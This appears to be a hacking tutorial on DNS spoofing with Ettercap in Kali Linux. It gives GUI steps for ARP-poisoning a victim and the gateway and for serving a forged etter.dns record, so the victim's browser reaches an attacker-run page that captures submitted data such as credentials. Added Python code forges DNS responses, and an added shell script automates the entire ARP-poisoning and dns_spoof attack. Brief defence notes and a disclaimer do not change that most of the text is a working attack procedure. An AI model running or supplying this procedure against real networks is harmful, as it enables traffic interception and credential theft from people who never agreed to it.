What is DNS?
When we type a website name into a browser, our system does not work with the readable name; it needs an IP address. Every website is reachable at an IP address, and DNS translates the human-readable name into that numerical address so our system can connect. You can open a website by its IP address too, but a human cannot remember the IP addresses of every website. That is why DNS was created.
To improve performance, the system saves each translation for some time in a local cache. If it gets another request for the same name, it answers from the cache without asking any other server, until that cache entry expires (its TTL runs out). This matters for spoofing: a forged answer that lands in the cache keeps redirecting the victim until it expires.
What is DNS Spoofing?
DNS spoofing is an attack in which lookups of a domain name are answered with a wrong IP address, so the victim's traffic for that name is diverted to a system the attacker controls. In this tutorial the attacker first poisons the victim's ARP table (ARP spoofing) to become the man in the middle between the victim and the gateway, then answers the victim's DNS queries with forged responses before the real ones arrive.
The attack is hard for the victim to notice: a host firewall or antivirus product does not, by default, flag a DNS answer that simply contains a different address. It is not undetectable, though. ARP monitoring (for example arpwatch), static ARP entries, a DNSSEC-validating resolver, and the certificate warning or HSTS error a browser raises when an HTTPS site resolves to a host that cannot present a valid certificate all expose it.
Suppose an attacker runs DNS spoofing against a victim and maps facebook.com to the attacker's own IP address. When the victim tries to open facebook.com, the spoofed answer sends the browser to the attacker's server instead of Facebook's. From there the attacker can serve a look-alike page and capture whatever the victim submits, such as credentials. Against an HTTPS site protected by HSTS the browser would refuse the attacker's server; the attack works cleanly against sites served over plain HTTP.
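To make concrete what the dns_spoof plugin does on the wire, and what a defender can look for, here is an added example in Python. It is not code from the original post or from Ettercap. It builds a normal A query, forges a response that reuses the query's transaction ID and carries an attacker-chosen address (the way dns_spoof does for names listed in etter.dns), and then implements the simplest detection check: two different answers arriving for one transaction ID. The domain byethack.blogspot.com comes from the tutorial; the transaction ID, the addresses 192.168.1.10 and 172.217.0.1, and the wildcard table are constructed sample data. Nothing is sent on the network.

```python
"""Build, forge and inspect DNS A-record packets (RFC 1035 wire format).

Added example, not Ettercap's code. It models what the dns_spoof plugin does
(answer a sniffed query with a forged A record that reuses the query's
transaction ID) and what a detector sees (two disagreeing answers for one
transaction ID). All names and addresses are constructed sample data.
"""
import fnmatch
import struct

QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name):
    """'a.b.c' -> b'\\x01a\\x01b\\x01c\\x00' (length-prefixed labels)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(pkt, off):
    """Return (name, offset after the name), following compression pointers."""
    labels = []
    while True:
        n = pkt[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0 == 0xC0:  # pointer: 14-bit offset into the packet
            ptr = struct.unpack("!H", pkt[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(pkt, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(pkt[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n


def build_query(txid, name):
    """A standard recursive A query, as a stub resolver would emit it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def forge_response(query, spoof_table, ttl=3600):
    """Answer `query` with an attacker-chosen A record, dns_spoof style.

    spoof_table maps etter.dns-like patterns ('*.blogspot.com') to IPv4
    strings. Returns None when nothing matches (the real answer then wins).
    """
    txid, = struct.unpack("!H", query[:2])
    name, off = decode_name(query, 12)
    qtype, qclass = struct.unpack("!HH", query[off:off + 4])
    if (qtype, qclass) != (QTYPE_A, QCLASS_IN):
        return None
    for pattern, ip in spoof_table.items():
        if fnmatch.fnmatchcase(name.lower(), pattern.lower()):
            break
    else:
        return None
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA
    question = query[12:off + 4]                                # echoed verbatim
    rdata = bytes(int(o) for o in ip.split("."))
    # 0xC00C = compression pointer to the question name at offset 12
    answer = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4) + rdata
    return header + question + answer


def answer_ips(resp):
    """(txid, [A-record IPs]) carried by a response packet."""
    txid, _flags, qd, an, _, _ = struct.unpack("!HHHHHH", resp[:12])
    off = 12
    for _ in range(qd):
        _, off = decode_name(resp, off)
        off += 4
    ips = []
    for _ in range(an):
        _, off = decode_name(resp, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        if rtype == QTYPE_A and rdlen == 4:
            ips.append(".".join(str(b) for b in resp[off:off + 4]))
        off += rdlen
    return txid, ips


def conflicting_answers(responses):
    """Detection check: transaction IDs that received more than one distinct
    A-record set. A legitimate resolver answers once; a forged reply racing
    the real one leaves two disagreeing answers for the same ID."""
    seen = {}
    for resp in responses:
        txid, ips = answer_ips(resp)
        seen.setdefault(txid, set()).add(tuple(sorted(ips)))
    return sorted(t for t, answers in seen.items() if len(answers) > 1)


if __name__ == "__main__":
    q = build_query(0x1234, "byethack.blogspot.com")
    forged = forge_response(q, {"*.blogspot.com": "192.168.1.10"})  # constructed
    legit = forge_response(q, {"byethack.blogspot.com": "172.217.0.1"})  # stands in for the real answer
    print("forged answer:", answer_ips(forged))
    print("conflicting txids:", [hex(t) for t in conflicting_answers([forged, legit])])
```

The same builder produces the "legitimate" packet in the demo only because a response is a response; on a real network the second answer comes from the recursive resolver. The detection function is deliberately naive (it trusts nothing, it only notices disagreement); a resolver that validates DNSSEC does not need it.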
So, let’s have a look at the tutorial.
Configure Ettercap in Kali Linux:
There are a lot of tools that can be used for DNS spoofing, but in this tutorial we use an open-source, easy-to-use tool called Ettercap. It comes with Kali Linux by default: go to Show Applications and search for ettercap. Both the GUI and the CLI interface of Ettercap are available in Kali Linux.
Before using the tool you have to change some of its configuration. Open a terminal and open Ettercap's configuration file, etter.conf, in a text editor (you need root to write to it).
Once the file is open, scroll down to the Linux section (the comment block mentioning Linux and iptables), like the picture below.
Ettercap uses iptables here to redirect the victim's connections through the Kali machine, and the rules are disabled by default. To enable them, remove the hash (#) from the front of the two redir_command lines (redir_command_on and redir_command_off) below the iptables comment, as in the picture, then save the file and exit.
After saving the file, start the Apache web server with the command
service apache2 start
Now copy your Kali Linux machine's local IP address and open it in a web browser. If the default Apache2 page opens, the web server started successfully.
In this tutorial we use our own website, byethack.blogspot.com, as the domain to spoof.
One more configuration change is needed: the etter.dns file, which holds the records the dns_spoof plugin serves. Open it in a text editor (again as root) and have your local IP address ready.
Scroll down the file to the line that reads "microsoft sucks". Right below it you will see records like those in the image below.
Change the microsoft.com domain name to the website you want to spoof, and change the IP address to your local IP address, where the Apache web server is running, as in the example picture. Each record has the form: name, record type (A), IP address. Ettercap also accepts a * wildcard in the name, so *.blogspot.com would catch every subdomain.
Now save the file and quit.
Now open a terminal and start Ettercap in its GUI mode as root.
In the menu bar go to Sniff > Unified sniffing. A pop-up asks you to choose the network interface: choose eth0 if you are on Ethernet; on Wi-Fi, wlan0 is offered instead.
Here we are on Ethernet, so we select eth0.
After you click OK it starts sniffing automatically, but we want to set the targets first, so stop it: go to Start > Stop sniffing.
Next, set up the targets. Before that, scan for hosts: go to Hosts > Scan for hosts. Ettercap scans the local network and lists every system it finds; view the list under Hosts > Hosts list.
In the picture, the first entry is the default gateway, the second is our own (attacker) machine, and the third is the target machine.
Select the default gateway (the first IP) and click Add to Target 2. Then select the victim's IP (the third one) and click Add to Target 1.
The targets now appear under the Targets menu, where you can delete a selected target or add another one.
Now go to the Mitm menu and choose ARP poisoning. A pop-up offers optional parameters: tick Sniff remote connections and click OK. This poisons the ARP tables of both the victim and the gateway, so traffic in both directions passes through the Kali machine.
Go to Plugins > Manage the plugins and double-click dns_spoof to activate it. At the bottom of the Ettercap window a message appears: Activating dns_spoof plugin.
Congrats, everything is set. Go to Start > Start sniffing. When the victim now tries to open byethack.blogspot.com, the dns_spoof plugin answers the lookup with your Kali IP and the browser lands on the Apache web server set up earlier. Whatever the victim submits to that page goes to you; a cookie for the spoofed domain is sent along only if the site is plain HTTP and the cookie is not flagged Secure. The forged record also sits in the victim's DNS cache until its TTL expires.
How to stop the attack:
Go to Start > Stop sniffing, then Mitm > Stop mitm attack(s); as it tears the poisoning down, Ettercap sends the correct ARP entries back to both targets. Then exit Ettercap. That does not reset everything on the Kali side, so to finish cleanly open a terminal and run the two commands below, one after the other, which bring the interface down and up and flush its state.
ifconfig eth0 down
ifconfig eth0 up
Now the attack has stopped properly. Two caveats: ifconfig is deprecated on current Kali, and the iproute2 equivalent is ip link set eth0 down followed by ip link set eth0 up; and the iptables redir_command lines you enabled in etter.conf stay enabled, so comment them out again if you no longer need them. On the victim, the forged record remains cached until the TTL you served expires, or until the victim flushes its resolver cache.
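The whole procedure above, from the etter.conf edit to the teardown, as an added POSIX shell example. It is not code from the original post or from Ettercap; it uses Ettercap's text mode, which takes the same settings as the GUI steps (unified sniffing on an interface, ARP poisoning with remote sniffing, the dns_spoof plugin, victim as Target 1 and gateway as Target 2). The file locations /etc/ettercap/etter.conf and /etc/ettercap/etter.dns are the standard Kali ones; the interface eth0, the addresses 192.168.1.10, 192.168.1.20 and 192.168.1.1, and the spoofed domain are assumptions to edit before running it with the argument run. The helper functions operate on whatever file you pass them, so they can be exercised on a copy first.

```shell
#!/bin/sh
# Added example, not code from the original post or from Ettercap: the GUI
# steps as POSIX shell, plus stop/cleanup. etter.conf and etter.dns are at
# their standard Kali paths; the interface, addresses and spoofed domain
# are assumptions, edit them before running with "run".
set -eu

ETTER_CONF=/etc/ettercap/etter.conf
ETTER_DNS=/etc/ettercap/etter.dns
IFACE=eth0                      # assumed wired interface (wlan0 on Wi-Fi)
ATTACKER_IP=192.168.1.10        # assumed Kali address running apache2
VICTIM_IP=192.168.1.20          # assumed victim, becomes Target 1
GATEWAY_IP=192.168.1.1          # assumed default gateway, becomes Target 2
SPOOF_DOMAIN=byethack.blogspot.com

# Uncomment the two Linux iptables redir_command_on/off lines, the edit the
# tutorial makes by hand. $1 = input etter.conf, $2 = output file.
enable_iptables_redirect() {
    sed -E 's/^([[:space:]]*)#[[:space:]]*(redir_command_(on|off)[[:space:]]*=[[:space:]]*"iptables.*)$/\1\2/' \
        "$1" > "$2"
}

# Number of redir_command lines that are live (not commented out) in $1.
active_redir_lines() {
    grep -Ec '^[[:space:]]*redir_command_(on|off)[[:space:]]*=' "$1" || true
}

# Append an etter.dns record "<name> A <ip>" to file $1. Ettercap accepts
# '*' wildcards in the name, e.g. '*.blogspot.com'.
add_spoof_record() {
    printf '%s A %s\n' "$2" "$3" >> "$1"
}

# Emulate the dns_spoof lookup: print the A record file $1 would serve for
# host $2 (first match wins, exact or wildcard); return 1 if none.
spoofed_ip_for() {
    while read -r name type ip _; do
        case "$name" in ''|'#'*) continue ;; esac
        [ "$type" = "A" ] || continue
        case "$2" in $name) printf '%s\n' "$ip"; return 0 ;; esac
    done < "$1"
    return 1
}

case "${1:-}" in
run)
    cp "$ETTER_CONF" "$ETTER_CONF.bak"                 # keep a pristine copy
    enable_iptables_redirect "$ETTER_CONF.bak" "$ETTER_CONF"
    service apache2 start                               # page the victim lands on
    add_spoof_record "$ETTER_DNS" "$SPOOF_DOMAIN" "$ATTACKER_IP"
    # Text-mode equivalent of Sniff > Unified sniffing, Mitm > ARP poisoning
    # with "Sniff remote connections", Plugins > dns_spoof, victim as
    # Target 1 and gateway as Target 2. Press q to quit; Ettercap then
    # re-ARPs both targets.
    ettercap -T -q -i "$IFACE" -M arp:remote -P dns_spoof \
        "/$VICTIM_IP//" "/$GATEWAY_IP//"
    ;;
stop)
    ip link set "$IFACE" down && ip link set "$IFACE" up   # iproute2 form of ifconfig down/up
    cp "$ETTER_CONF.bak" "$ETTER_CONF"                     # iptables lines commented out again
    ;;
esac
```

Running the script with no argument only defines the functions, which is what makes a dry run on a copied etter.conf and a scratch etter.dns safe; the victim's cached record is the one thing this cleanup cannot undo.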
This tutorial is for educational purposes only. Try it on your own local network and your own machines. Do not use it to harm others: attacking a system without the owner's permission is unethical and, in most places, illegal. We are not responsible for any damage.